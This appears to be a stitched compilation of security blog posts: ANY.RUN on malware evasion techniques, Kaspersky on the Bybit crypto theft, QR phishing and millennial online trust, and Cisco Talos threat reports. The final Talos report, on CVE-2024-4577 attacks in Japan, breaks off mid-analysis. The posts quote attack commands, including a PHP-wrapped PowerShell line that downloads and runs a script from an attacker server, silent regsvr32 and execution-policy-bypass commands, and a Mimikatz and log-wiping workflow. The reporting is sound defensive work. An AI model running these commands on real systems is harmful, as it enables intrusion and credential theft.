5 Common Evasion Techniques in Malware 

Cybercriminals are constantly refining their methods to stay one step ahead of security defenses. One of their key tactics is evasion, a set of techniques designed to hide malicious activity, bypass detection, and make investigations much more difficult for security teams. 

Over time, attackers have developed countless evasion techniques, and they continue to evolve as cybersecurity measures improe. Some methods exploit trusted system processes, while others rely on cleverly disguising malicious code to slip past defenses unnoticed. 

Let’s take a closer look at some of the most commonly used evasion techniques and see how they play out in real-world scenarios inside our secure sandbox, helping businesses detect threats faster, strengthen defenses, and minimize security risks before they cause damage. 

What You Should Know About Evasion Techniques 

When you’re defending your company’s network, one of the trickiest things you’ll face is attackers using evasion techniques. These are deliberately designed to stay under your radar, hiding malware and suspicious activity from detection tools and making incident response even tougher. 

Cybercriminals use evasion techniques to:
  • Avoid detection by security tools and analysts.
  • Extend dwell time inside compromised networks.
  • Increase the success rate of malware delivery.
  • Make investigations more challenging for security teams.
  • Reduce the risk of their operations being uncovered.
  • Enhance persistence and maintain long-term access to systems.

Knowing how these evasion tactics work can help your security team spot threats sooner, respond faster, and avoid major disruptions to your business. 

How Attackers Stay Hidden: Key Evasion Techniques 

Let’s have a look at some of the most commonly used evasion techniques and how they work in real-world attacks: 

1. T1027.003: Steganography 

Steganography is a sneaky way cybercriminals hide malicious data right inside harmless-looking images. Unlike encryption, which openly scrambles data to make it unreadable, steganography is all about staying invisible. 

With this technique, attackers embed malware inside the images you’d never suspect. Because the hidden code blends seamlessly into regular files, traditional security software rarely spots it. That’s exactly why steganography has become such a popular and dangerous method attackers use to quietly slip past your defenses. 

By analyzing suspicious files in ANY.RUN’s interactive sandbox, you can quickly uncover hidden threats and figure out exactly what techniques attackers are using. 

Let’s dive into a real-world example, and see step-by-step how to spot steganography quickly and easily without breaking a sweat. 

View analysis session 

Steganography campaign starting with a phishing PDF 

In this analysis session, attackers used a phishing PDF to trick users into downloading a malicious registry file.  

Once executed, the file added a hidden script to the system registry, automatically launching on reboot. 

Autorun value change in the registry detected by ANY.RUN 

Once the system restarts, a registry entry quietly triggers PowerShell to download a VBS script from a remote server. In ANY.RUN’s sandbox, you can easily track this action by inspecting the PowerShell process from the right side of the screen. 

Powershell.exe downloading a VBS file inside a secure environment 

Next, the downloaded script fetches a regular-looking image file, which secretly contains a hidden DLL payload.  

Image with malicious DLL payload detected by ANY.RUN  

With ANY.RUN, you can quickly pinpoint exactly where the malware hides within the file. By exposing hidden payloads like XWorm, security teams can accelerate threat detection, reduce incident response time, and prevent costly breaches before they escalate. 

Inspecting the image’s HEX data reveals a clear marker (<<BASE64_START>>) and encoded executable code, confirming the use of steganography to conceal the malicious XWorm payload. 

Static analysis of the malicious image 

When extracted, the hidden malware deploys XWorm, granting attackers remote control over the infected system. 

Analyze emerging threats inside the safe and secure ANY.RUN Interactive Sandbox 



Sign up for free


2. T1562.001: Disable or Modify Tools 

Cybercriminals often attempt to disable or interfere with security software to ensure their malicious activities go unnoticed. By disrupting or modifying security tools, attackers can prevent detection, maintain ongoing access, and carry out their goals without interruption. 

They might achieve this by terminating antivirus processes, altering registry settings, or adding exclusions so their malware bypasses detection entirely. 

View analysis session with T1562.001 technique 

Adding extension to the Windows Defender exclusion list inside 

In an analysis session conducted in the ANY.RUN sandbox, cyber criminals specifically targeted Windows Defender.  

They used the legitimate system tool sihost.exe (PID 2420) to quietly add file extensions to Windows Defender’s exclusion list. This prevented the security software from scanning certain malicious files, allowing the attacker’s payload to execute without being flagged. 

Sihost.exe with its conducted processes 

You can also view the full map of MITRE ATT&CK techniques related to any analysis session. This gives security teams instant clarity on attack tactics, helping businesses speed up investigations. 

 Simply click the “ATT&CK” button in the upper-right corner inside ANY.RUN to learn more about specific evasion techniques. 

MITRE ATT&CK Matrix techniques displayed inside ANY.RUN sandbox 

 
3. T1140 Deobfuscate/Decode Files or Information 

Attackers often conceal their malware using encoding or obfuscation methods to avoid detection. One common technique is encoding malicious payloads in Base64, turning recognizable code into what appears as harmless, random text. This method helps attackers bypass traditional security tools that might otherwise flag suspicious files or scripts. 

When the malware reaches the victim’s system, it gets decoded or deobfuscated back into executable form, allowing the attack to continue undetected. Because encoded data initially looks innocent, standard security scans often miss these threats entirely, giving cybercriminals the opportunity to quietly deliver and execute their malware. 

Try premium features of ANY.RUN for free 



Get 14-day trial


Attackers commonly use several methods to obfuscate or encode malicious files, including: 

  • Base64 encoding: Converts malware into text strings that seem harmless and difficult to detect. 
  • Encryption: Scrambles the payload, making it unreadable without a specific key. 
  • Compression: Reduces file size and disguises malicious code, making detection harder. 
  • String Obfuscation: Breaks recognizable text or commands into fragmented, obscure parts. 
  • Packing: Embeds malware within compressed or protected executables that unpack at runtime. 
  • Script Obfuscation: Uses complex or confusing scripts to hide malicious intent. 
  • Character Substitution: Replaces clear commands or URLs with unusual or encoded characters to evade simple scans. 

View analysis session with T1140 technique 

Decoding of a binary file from Base64 detected by ANY.RUN 

In this ANY.RUN analysis session, attackers used this exact method (PID 1164), decoding a malicious binary file from Base64.  

Using ANY.RUN’s Script Tracer feature, analysts can immediately identify and visualize the decoded content, revealing the previously hidden malicious activity clearly and quickly, allowing security teams to accelerate threat response, minimize damage, and prevent further compromise. 

Script Tracer revealing the decoded content 

4. T1564.003: Hidden Window 

Attackers often use hidden windows to quietly carry out malicious activities without users noticing. Normally, when an application runs, it opens a visible window, alerting users to its presence. However, cybercriminals leverage built-in system and scripting features to hide these windows, making their actions virtually invisible. 

Common methods attackers use include: 

  • PowerShell Commands: Using commands like powershell.exe -WindowStyle Hidden to execute scripts without displaying a window. 
  • Visual Basic and Jscript: Employing script functions specifically designed to launch processes silently in the background. 
  • Hidden Startup Processes: Configuring malware to run silently upon system reboot, with no visible window or notification. 
  • macOS plist Manipulation: Editing macOS property list (plist) files to prevent apps from appearing visibly in the dock, thus hiding malicious activities. 

View analysis session with T1564.003 technique 

T1564.003 evasion technique detected inside ANY.RUN sandbox 

In a real-world ANY.RUN sandbox analysis, attackers executed PowerShell using an invisible window to conceal malicious activities. Specifically, they ran the following command: 

“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -NoProfile -ExecutionPolicy Bypass -Command “<malicious_script>” 

This command executes silently without displaying any visual indicators. The script itself attempts to disable Windows Defender by downloading and executing a batch file (source.bat) quietly in the background.  

Next, it downloads a rootkit named MasonRootkit.exe from a remote GitHub repository and launches it silently, either with elevated privileges (RunAs) or as a regular user, depending on the conditions set in the script. 

Dangerous activity detected inside ANY.RUN VM 

Because the entire process happens invisibly, most users see no unusual windows or alerts. Security teams using ANY.RUN can quickly uncover such hidden activities by examining detailed process execution logs and script behaviors, helping companies promptly respond to and mitigate the threat. 

5. T1218.010: Regsvr32 

Cybercriminals frequently misuse trusted system utilities like Regsvr32.exe to quietly execute malicious DLL payloads. Since Regsvr32 is a legitimate Windows tool typically used for registering DLL files, its misuse often goes unnoticed by antivirus software and security tools. 

Attackers exploit this built-in utility to: 

  • Silently execute malicious DLL files. 
  • Evade application control policies and antivirus detections. 
  • Maintain stealthy persistence on compromised systems. 

View analysis session with T1218.010 technique 

Execution of malicious DLL payload 

In this analysis session conducted in the ANY.RUN sandbox, the victim installed the application ManyCam, which dropped a suspicious DLL file (VideoSrcvbm.dll) into its program directory. 

The attackers then leveraged the trusted Windows utility Regsvr32.exe to quietly execute this malicious DLL: regsvr32 /s “C:Program Files (x86)ManyCamBinVideoSrcvbm.dll” 

Suspicious DLL file dropped  

Because this DLL execution used the legitimate Regsvr32.exe tool, it avoided standard security detections, allowing attackers to maintain stealth and persist unnoticed. 

Quick Detection of Evasion Techniques with ANY.RUN 

As we can see, one of the fastest ways to uncover evasion techniques is by analyzing suspicious files using the ANY.RUN sandbox.  

Within seconds, ANY.RUN visually maps the complete attack flow, clearly displaying all relevant MITRE ATT&CK tactics and techniques involved. This helps security teams quickly understand attack patterns, prioritize threats, and make faster, data-driven response decisions to protect business assets. 

To quickly understand the techniques used in a particular attack : 

  • Open your analysis session in the ANY.RUN sandbox. 
  • Click on the “ATT&CK” button located in the upper-right corner. 
  • Instantly view a detailed map of the attacker’s tactics and techniques. 
  • Click any technique for an in-depth explanation, additional context, and deeper insights. 

Conclusion 

Cybercriminals continuously refine their evasion tactics, making threat detection and response harder. Techniques like steganography, disabling security tools, script obfuscation, hidden windows, and Regsvr32 abuse allow attackers to bypass defenses and maintain access. 

For businesses and security teams, recognizing these tactics is important to protect sensitive data, maintain compliance, and prevent costly breaches. Without clear visibility into attacker methods, organizations risk financial loss, reputational damage, and prolonged intrusions. 


ANY.RUN cloud interactive sandbox interface

Sandbox for Businesses

Discover all features of the Enterprise plan designed for businesses and large security teams.



ANY.RUN’s interactive sandbox gives you the real-time visibility you need to detect even the most advanced evasion techniques. Within seconds, you can: 

  • See the full attack flow mapped with MITRE ATT&CK techniques. 
  • Analyze suspicious files in an isolated environment without risk to your network. 
  • Detect hidden threats that traditional security tools might miss. 
  • Get instant insights to improve response times and mitigate risks. 
  • Generate well-structured reports with IOCs and key findings, making it easy to share crucial threat intelligence with your team. 

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request trial of ANY.RUN’s services for your company → 

The post 5 Common Evasion Techniques in Malware  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

How to store cryptocurrency after the Bybit hack | Kaspersky official blog

February 21 was a dark day for the crypto market as it suffered the largest heist in its history. Attackers made off with around $1.5 billion from Bybit, the world’s second-largest crypto exchange, with experts citing it as the biggest theft – of anything – of all time. Although neither this loss nor the withdrawal of a further $5 billion by panicked investors were fatal for Bybit, the incident underscores the fundamental flaws in the modern crypto ecosystem, and serves up some valuable lessons for regular users.

How Bybit was robbed

Like all major crypto exchanges, Bybit secures stored cryptocurrency with multi-layered protection. Most funds are stored in cold wallets disconnected from online systems. When current assets need topping up, the required sum is manually moved from the cold wallet to the hot one, and the operation is signed by several employees at once. For this, Bybit uses a multi-signature (multisig) solution from Safe{Wallet}, and each employee involved in the transaction signs it using a private Ledger hardware cryptokey.

The attackers studied the system in detail and, according to independent researchers, compromised a Safe{Wallet} developer machine. Presumably, malicious modifications were made to the code for displaying Safe{Wallet} web application pages. But the logic bomb inside it was triggered only if the transaction source matched the Bybit contract address — otherwise Safe{Wallet} worked as usual. Having conducted their own investigation, the owners of Safe{Wallet} rejected the findings of the two independent information security companies, insisting that their infrastructure had not been hacked.

So what happened? During a routine top-up of $7 million to a hot wallet, Bybit employees saw on their computer screens this exact amount and the recipient’s address, which matched the hot wallet address. But other data got sent for signing instead! For regular transfers, the recipient’s address can (and should!) be checked on the screen of the Ledger device. But when signing multisig transactions, this information isn’t displayed — so Bybit employees essentially made a blind transfer.

As a result, they inadvertently green-lighted a malicious smart contract that moved the entire contents of one of Bybit’s cold wallets to several hundred fake wallets. As soon as the withdrawal from the Bybit wallet was complete, it appears that the code on the Safe{Wallet} website reverted to the harmless version. The attackers are currently busy “layering” the stolen Ethereum — transferring it piecemeal in an attempt to launder it.

By the looks of it, Bybit and its clients were the victims of a targeted supply-chain attack.

The Bybit case is no one-off

The FBI has officially named a North Korean group codenamed TraderTraitor as the perpetrator. In information-security circles, this group is also known as Lazarus, APT38, or BlueNoroff. Its trademark style is persistent, sophisticated and sustained attacks in the cryptocurrency sphere: hacking wallet developers, robbing crypto exchanges, stealing from ordinary users, and even making fake play-to-earn games.

Before the Bybit raid, the group’s record was the theft of $540 million from the Ronin Networks blockchain, created for the game Axie Infinity. In that 2022 attack, hackers infected the computer of one of the game’s developers using a fake job offer in an infected PDF file. This social engineering technique remains in the group’s arsenal to this day.

In May 2024, the group pulled off a smash-and-grab of over $300 million from Japanese crypto-exchange DMM Bitcoin, which went bankrupt as a consequence. Before that, in 2020, more than $275 million was siphoned off the KuCoin crypto exchange, with a “leaked private key” for a hot wallet cited as the reason.

Lazarus has been honing its cryptocurrency theft tactics for over a decade now. In 2018, we wrote about a string of attacks on banks and crypto exchanges using a Trojanized cryptocurrency trading app as part of Operation AppleJeus. Experts at Elliptic estimate that North-Korea-linked actors’ total criminal earnings amount to around $6 billion.

What crypto investors should do

In the case of Bybit, clients were lucky: the exchange promptly serviced the wave of withdrawal requests that ensued, and promised to compensate losses from its own funds. Bybit remains in business, so clients don’t need to take any particular action.

But the hack demonstrates once again just how hard it is to secure funds flowing through blockchain systems, and how little can be done to cancel a transaction or refund money. Given the unprecedented scale of the attack, many have called for the Ethereum blockchain to be rolled back to its pre-hack state, but Ethereum developers consider this “technically intractable”. Meanwhile, Bybit has announced a bounty program for crypto exchanges and ethical researchers to the tune of 10% of any funds recovered, but so far only $43 million has materialized.

This has caused some crypto industry experts to speculate that the main fallout from the hack will be a rise in self-custody of crypto assets.

Self-custody shifts the responsibility for secure storage from the shoulders of specialists to your own. Therefore, only go down this route if you have total confidence in your abilities to master all security measures and follow them rigidly day by day. Note that regular users without cryptowallet millions are unlikely to face a sophisticated attack targeted specifically at them, while generic mass attacks are easier to deflect.

So, what do you need for secure self-custody of cryptocurrency?

  • Buy a hardware wallet with a screen. This is the most effective way to protect crypto assets. Do a little research first, and be sure to buy a wallet from a reputable vendor — and directly: never second-hand or from a marketplace. Otherwise, you might get a pre-hacked wallet that swallows up all your funds. When using a wallet to sign transfers, always check the recipient’s address on both the computer screen and the wallet screen to rule out its substitution by a malicious smart contract or a clipper Trojan that replaces cryptowallet addresses in the clipboard.
  • Never store wallet seed phrases in electronic form. Forget about using files on your computer and photos in your gallery for that — modern Trojans have learned to infiltrate Google Play and the App Store and recognize data in photos stored on your smartphone. Only paper records (or metal engravings, if you prefer) kept inside a safe or in another physically secure place, protected from both unauthorized access and natural disasters, will do. You might consider multiple storage locations, as well as splitting your seed phrase into parts.
  • Don’t keep all your eggs coins in one basket. For holders of large amounts or different types of crypto assets, it makes sense to use multiple wallets. Small amounts for transactional needs can be stored on a crypto exchange, while the bulk can be divided among several hardware cryptowallets.
  • Use a dedicated computer. If possible, dedicate a computer for cryptocurrency transactions. Physically restrict access to it (e.g., put it in a safe, a locked cupboard or locked room), use disk encryption and password login, and have a separate account with its own passwords (i.e., different to those on your main computer). Install reliable protection and enable maximum security settings on your “crypto-computer”. Connect it to the internet only for transactions, and use it solely for operations with wallets. Playing games, reading crypto news, and chatting with friends are for another device.
  • If dedicating a computer is impractical or uneconomical, maintain strict digital hygiene on your main computer. Set up a separate account with low privileges (non-administrator) for crypto operations, and another account — also non-administrator — for work, chat and games. There’s no need to work in administrator mode at all, except to update the system software or significantly reconfigure the computer. Sign in to your dedicated “crypto account” only for operations with wallets, and sign out immediately afterward. Don’t give outsiders access to the computer, and don’t share admin passwords with anyone.
  • Take care when choosing cryptowallet software. Carefully study the software’s description, make sure that the application has been on the market for a long time, and check that you’re downloading it from the official website, and that the digital signature of the distribution corresponds to the website and the name of the vendor. Perform a deep scan of your computer with an up-to-date security solution before installing and running cryptowallet software.
  • Be careful with updates. While we usually recommend updating all software right away, in the case of cryptocurrency applications, it’s worth adjusting this policy a little. After the release of a new version, wait about a week and read the reviews before installing it. This will give the community time to catch any bugs or Trojans that may have sneaked into the update.
  • Follow the enhanced computer security measures described in our post Protecting crypto investments: four key steps to safety, which include installing a powerful security solution, such as Kaspersky Premium, on your computer and smartphone, regularly updating your operating system and browsers, and using strong, unique passwords.
  • Expect phishing. Cryptocurrency fraud can be both multifaceted and sophisticated, so any unexpected messages by email, messenger app and the like should be seen as the start of a scam. Keep on top of all the latest crypto scams by following our blog or Telegram channel, as well as other reputable cybersecurity sources.

Read more about crypto scams and ways to protect yourself in our dedicated posts:

Kaspersky official blog – ​Read More

Technology to check QR codes for phishing | Kaspersky official blog

In an attempt to bypass security solutions, attackers are increasingly hiding phishing and other malicious links inside QR codes. It’s for this reason that we’ve added a technology to Kaspersky Secure Mail Gateway that reads QR codes (including ones hidden inside PDF files), extracts links and checks them before they land in an employee’s inbox. We explain how it works.

Example of a phishing QR code inside a PDF file

Example of a phishing QR code inside a PDF file

Why do attackers use QR codes?

Ever since even basic security tools learned to check phishing links effectively enough, attackers have been inventing ways to hide them from scanners. The most commonly employed trick is to post links on third-party services; that way, victims don’t receive an email directly from the attackers, but a notification from some legitimate site where a document with a malicious link is already placed. While such ploys work well on home users, with company employees the success rate is far lower. That’s because any self-respecting organization these days has equipped all its work computers with security software that catches redirects to phishing sites.

Therefore, attackers have turned their attention to QR codes. First, this technology obligingly transforms regular URLs into something incomprehensible to standard systems that check links for malicious intent. Second, QR codes are common enough for people to scan them without a second thought. And third and most important, people overwhelmingly scan QR codes with a phone or tablet that may not have a security solution with anti-phishing technology – especially if it’s a personal, not work, device.

Plus, in this case, less suspicion is raised by the prompt to enter work credentials, which are what the attackers basically want. On a computer, the user is likely to be signed in already, but accessing work systems from a personal device requires additional authentication, right?

The goal of most phishing schemes is to extract work credentials

The goal of most phishing schemes is to extract work credentials

Why are QR codes most often hidden in PDF files?

Sure, a QR code can also be sent in the body of an email. But hardly anyone will follow a QR code without a few words explaining why they should, and this text can be analyzed and flagged as phishing. Besides, an image has certain characteristics – at least its dimensions – by which it can be identified.

Phishing QR code in an image in the body of an email

A PDF file, on the other hand, is a kind of black box. The format is proprietary – you can’t peek inside without special tools. In addition, the cover email can contain minimal text, something like: “Important! All information in the PDF”

Phishing email with a PDF file and minimal accompanying information

Phishing email with a PDF file and minimal accompanying information

How does our technology work?

Of course, a QR code in an email isn’t always a sign of phishing. For example, mobile application developers often furnish their PDF documents and mailings with direct links to app stores. In general, it’s a quick and easy way to send a link to a phone. That’s why we can’t mark each email with a QR-code as a suspicious. So our developers created a tool to extract URLs from QR codes for additional checking by anti-phishing modules and anti-spam heuristics.

Not only can the technology extract URLs from QR codes in images, but also check PDF files – extracting all links from all QR codes found inside them. If a link is recognized as phishing, the email is also flagged as phishing and processed in accordance with the Kaspersky Secure Mail Gateway settings. So the end user never even sees the dangerous QR code. The best outcome!

Kaspersky official blog – ​Read More

The digital illusion: millennials and online safety risks | Kaspersky official blog

Millennials have grown up alongside the rise of social media and digital communication – and in many ways appear to be the most tech-savvy generation. However, our latest research reveals a concerning reality: 70 percent of millennials rarely verify the authenticity of the people they engage with online, leaving them vulnerable to cyberrisks such as identity fraud, misinformation, and emotional deception.

As digital friendships and online communities become increasingly central to daily life, many millennials need rethink their approach to online trust (actually, so do other generations, of course, but today we concentrate on the “millennial paradox”). The desire for connection and validation is driving significant behavioral shifts – from prioritizing social-media interactions over real-world relationships, to oversharing personal information in digital spaces. These trends expose users to heightened cybersecurity threats – making digital literacy and caution more important than ever.

The trust paradox: digital natives, yet still vulnerable to deception

Despite being the first generation to embrace the internet fully, many millennials place misplaced trust in their online interactions. While 64 percent have encountered someone misrepresenting their identity, nearly half still trust information shared within their digital communities. This contradiction highlights a gap between perceived digital expertise and actual cybersecurity awareness.

Digital paradox: millennials' trust gap exposed

Digital paradox: millennials’ trust gap exposed

Cyber-psychologist Ruth Guest warns that this overconfidence can lead to risky behavior. “When we trust our own digital savvy implicitly, we may overlook the possibility that others are not as genuine as they appear. In some cases, individuals with strong narcissistic, psychopathic or Machiavellian traits exploit this trust through catfishing and other deceptive tactics.”

Rethinking digital trust means applying a level of skepticism that matches real-world caution. A strong cybersecurity mindset requires more than technical skills – it demands critical thinking and vigilance.

From social validation to privacy risks

Social media has become the go-to space for millennials to share major life updates – often before informing close friends or family. Our research shows that nearly half of millennials post significant personal news online before discussing it in person with anyone. The instant feedback from likes, comments, and shares can create a sense of validation – but it also comes with risks.

Forty-five percent of millennials are comfortable sharing personal or sensitive information online – a behavior that can increase their exposure to phishing scams, identity theft, and doxing. Cybercriminals use publicly available information to craft targeted attacks – exploiting personal details such as location check-ins, workplace updates, and relationship status.

Chronic oversharers: millennials risk privacy for connection

Chronic oversharers: millennials risk privacy for connection

According to Marc Rivero, Lead Security Researcher at Kaspersky, “Oversharing personal information online can make individuals more vulnerable to identity theft, phishing attacks, and social engineering scams. Personal details shared online, such as location check-ins, relationship status, and daily routines, can be exploited for targeted scams or unauthorized surveillance.”

To mitigate these risks, it’s important to reconsider what’s shared, strengthen privacy settings, and remain cautious about how digital footprints are being used.

Digital friendships: a balance between connection and risk

As loneliness rises among young adults (among other generations), online friendships have become an essential part of social life. Our study found that 29 percent of millennials report that digital friendships positively impact their mental health. Online communities provide a sense of belonging, and allow users to connect with like-minded individuals across the world.

Digital escape: millennials seek solace in online communities

Digital escape: millennials seek solace in online communities

However, not all online interactions are positive. Ten percent of millennials report negative experiences from digital interaction. Even more concerning, 14 percent admit to creating fake profiles or using false identities themselves. These statistics highlight the prevalence of digital deception and the challenges of distinguishing between genuine and fabricated relationships.

Back to cyber-psychologist Ruth Guest, she emphasizes the importance of balance. “Digital spaces have evolved into safe and creative havens where millennials can explore, learn and connect with like-minded individuals. When used wisely and with proper safeguards, social media can be a tremendous asset to one’s mental health. It offers a platform for self-expression, a sense of belonging, and even creative inspiration. However, it is crucial to remember that the benefits of these online communities depend on maintaining a balance.”

How millennials can strengthen their digital defenses

As key players in the digital world, millennials need to take proactive steps to protect their online presence and encourage stronger cybersecurity habits in those around them. Implementing essential security measures can help reduce exposure to online threats and foster safer digital habits.

1. Verify identities

  • Use reverse-image searches, and cross-check profiles before engaging with new contacts.

2. Cross-check information

3. Protect personal information

  • Adjust social-media privacy settings, and use our online privacy checker to enhance security.
  • Be mindful of real-time location sharing to avoid tracking risks.

4. Respect others’ privacy

5. Stay educated regarding online scams

6. Use strong passwords and security tools

7. Keep devices updated and secure

  • Regularly update apps, software, and antivirus programs to prevent vulnerabilities being exploited.
  • Use Kaspersky Premium for real-time protection against identity theft, malicious links, and cyberthreats.

To access the full research report, visit the link.

Kaspersky official blog – ​Read More

Who is Responsible and Does it Matter?

Who is Responsible and Does it Matter?

Welcome to this week’s edition of the Threat Source newsletter.

At Talos we bat on behalf of our customers, protecting them against all manner of cyber threats that may affect them. The nature of the threat actor and their origin or affiliation makes no difference; if they are attacking or planning to attack a customer, we do our utmost to stop them.

In practice, identifying the origin of attacks can be surprisingly difficult, much harder than identifying the attack itself.  Attacks do not arrive wrapped in a flag with a certificate of origin. Typically, attackers seek to hide their origin so as to avoid the attention of law enforcement or the international community. However, although not an easy task, the attacker will often unwittingly leave clues to their identity.

We are all creatures of habit; we all have our preferred methods of doing things, tools that we are familiar with, or suppliers that we often choose over another. Threat actors are no different. Over time, the choices made by a threat actor in how they carry out their attacks, the methods they use, and their choice of victims builds to become a characteristic fingerprint.

New attacks can be analysed to identify if their characteristics overlap with those of a known threat actor. If so, we may surmise that the attack has been carried out by that threat actor. Nevertheless, uncovering and understanding the relationship between an attack and the threat actor behind the attack requires detailed research or possibly will only become apparent with the passage of time and the publication of additional information.

Even if an attack can be attributed to a known threat actor, the nature and origin of that threat actor may be obscure. Threat actors rarely admit to their actions and volunteer their identity. A detailed investigation by law enforcement or intelligence agencies may identify an attacker’s identity. Otherwise the security industry refers to known threat actors by various pseudonyms, few of which are definitively tied to one or more named individuals or an organistation. Understanding and communicating degrees of uncertainty when it comes to describing threat actors is a key skill in the threat intelligence community.

Suffice to say that we do not pick and choose the threats that we block. We block them regardless of their origin because this is who we are and what we do, and in any case, identifying the origin of a threat is not a simple matter.

The one big thing

Lotus Blossum is a sophisticated threat actor that we’ve uncovered conducting espionage campaigns against the government, manufacturing, telecoms, and media sectors in Vietnam, Hong Kong, Taiwan, and the Philippines. As part of this activity, the threat actor uses the Sagerunex family of backdoor malware for command and control activity. 

Why do I care?

Understanding how threat actors such as Lotus Blossom conduct their operations helps inform organisations about the defenses that are required to protect against this and similar threats. Even if you are not working within one of the affected industrial sector, other threat actors may be conducting information stealing campaigns against you.

So now what?

Use the IOCs associated with the campaign to search for evidence of incursion within your own organization. Use this exercise as a means of verifying that you have visibility of the systems on your network and that you are able to search for known malicious IOCs.

Top security headlines of the week

244 million additional compromised passwords from a data dump offered for sale by criminals have been added to the privacy breach notification service “Have I Been Pwned”. (The Register)

A massive botnet consisting of more than 86 000 compromised IoT devices is conducting DDoS attacks against telecom firms and gaming platforms. (Cybersecurity Dive)

The US agency, CISA reports that it will continue to defend against threats including those from Russia. (TheRecord)

Can’t get enough Talos?

In The Talos Threat Perspective episode 9, Hazel Burton speaks with Nick Biasini about changes in social engineering techniques.

Upcoming events where you can find Talos

RSA (April 28-May 1, 2025)  San Francisco, CA  
CTA TIPS 2025 (May 14-15, 2025) Arlington, VA 
Cisco Live U.S. (June 8 – 12, 2025) San Diego, CA 

Most prevalent malware files from Talos telemetry over the past week

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 
MD5: 71fea034b422e4a17ebb06022532fdde 
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 
Typical Filename: VID001.exe 
Claimed Product: N/A 
Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe  
Detection Name: Simple_Custom_Detection

SHA256: 592835f805da0d9a24a5d91a0f77ad9988853da34a97b50e75e77c72573edeac
MD5: 6361f25ede0442f2e0ad3bcd33c331c8
Typical Filename: KMSSS.exe
Detection Name: PUA.Win.Dropper.Hackkms::tpd
VirusTotal: https://www.virustotal.com/gui/file/592835f805da0d9a24a5d91a0f77ad9988853da34a97b50e75e77c72573edeac

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: img001.exe
Detection Name: Win.Trojan.Miner-9835871-0
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

Cisco Talos Blog – ​Read More

Unmasking the new persistent attacks on Japan

  • Cisco Talos discovered malicious activities conducted by an unknown attacker since as early as January 2025, predominantly targeting organizations in Japan.  
  • The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines.  
  • The attacker utilizes plugins of the publicly available Cobalt Strike kit “TaoWu” for-post exploitation activities. 
  • Talos found a pre-configured installer script on the command and control (C2) server that deploys a full suite of adversarial tools and frameworks hosted on an Alibaba cloud container Registry, highlighting the potential misuse of such tools for malicious purposes by the attacker. 
  • Talos noticed the attacker’s attempt at stealing the victim’s machine credentials. However, we assess with moderate confidence that the attacker’s motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks. 
  • We reported an increasing trend of threat actors exploiting vulnerable public facing applications for initial access in our quarterly Talos Incident Response (Talos IR) report for Q4 2024, and the discovery of this intrusion highlights this ongoing activity.  

Victimology  

Unmasking the new persistent attacks on Japan

We found that the attacker predominantly targets organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artefacts.  

Unmasking the new persistent attacks on Japan

Attack overview  

The attacker attempts to compromise the victim machine using an exploit program targeting the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows. In the event of successful exploitation, the attacker executes PowerShell script to run Cobalt Strike reverse HTTP shellcode, ensuring remote access to the victim machine.  

Then, they begin reconnaissance by gathering system details and user privileges. They execute privilege escalation exploit programs, such as JuicyPotato, RottenPotato, and SweetPotato, to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using the plugins of the Cobalt Strike kit called “TaoWu.”  

To maintain stealth, they erase event logs using wevtutil commands, removing traces of their actions from the Windows security, system, and application logs. They further perform network reconnaissance using “fscan.exe” and “Seatbelt.exe” to map out potential lateral movement targets. The attacker has also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Eventually, they execute Mimikatz commands to dump and exfiltrate passwords and NTLM hashes from memory on the victim’s machine.  

Unmasking the new persistent attacks on Japan

Initial access 

Talos discovered that the attacker gains initial access to the victim’s network by exploiting the vulnerability CVE-2024-4577.  

CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations using CGI configurations. It arises from the “Best-Fit” behavior in Windows code pages, where certain characters are replaced in command-line inputs. The flaw in the PHP-CGI module misinterprets these characters as PHP options, allowing attackers to execute arbitrary PHP code on the server when using Apache with a vulnerable PHP-CGI setup.  

To target the vulnerability, the attacker leverages a publicly available exploit Python script “PHP-CGI_CVE-2024-4577_RCE.py”. The script checks to see if a specific URL is vulnerable to the CVE-2024-4577 vulnerability. It does this by sending a specifically crafted POST request to a target URL with PHP code designed to trigger the vulnerability. If the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e”, it indicates a successful exploitation. Then, the exploit script prompts the user to input commands as PHP code that are executed on the vulnerable servers and gets the response displayed to the attacker.  

Unmasking the new persistent attacks on Japan
Snippet of the CVE-2024-4577 exploit script.

In this intrusion, we found that the attacker has executed an embedded PowerShell command in the PHP code to trigger the infection.  

<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1')"');?>

The attacker triggers the infection by executing the PowerShell command through the PHP code, leading to the download and execution of a PowerShell injector script from the C2 server on the victim machine memory.  

